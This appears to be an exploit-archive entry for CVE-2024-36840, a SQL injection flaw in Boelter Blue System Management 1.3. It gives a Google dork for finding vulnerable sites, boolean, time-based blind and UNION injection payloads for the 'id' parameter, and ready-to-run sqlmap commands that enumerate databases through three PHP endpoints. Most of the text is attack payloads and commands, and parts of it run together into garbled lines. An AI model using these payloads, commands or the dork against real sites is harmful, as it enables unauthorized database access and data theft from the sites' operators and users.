
Exploit For: CVE-2024-36840: SQL Injection Vulnerability in Boelter Blue System Management (Version 1.3)
Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)
Original Google Dork: inurl:"Powered by Boelter Blue" (didn't worked(zero url in search))
Google Dork By Theexploiters: intext:"Powered by Boelter Blue" (working)
Date: 2024-06-04
Exploit Author: CBKB (DeadlyData, R4d1x)
Vendor Homepage: Boelter Blue
Software Link: Google Play Store
Version: 1.3
Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
CVE: CVE-2024-36840
Multiple SQL Injection vulnerabilities have been identified in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to inject and execute arbitrary SQL commands through various parameters. Successful exploitation may result in unauthorized access, data exfiltration, and potential account takeovers.
Parameter: id (GET)
id=10071 AND 4036=4036Type: Time-based blind
id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION query
id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...news_details.php?id
https://www.example.com/news_details.php?id=10071sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
services.php?section
https://www.example.com/services.php?section=5081sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
location_details.php?id
https://www.example.com/location_details.php?id=836sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs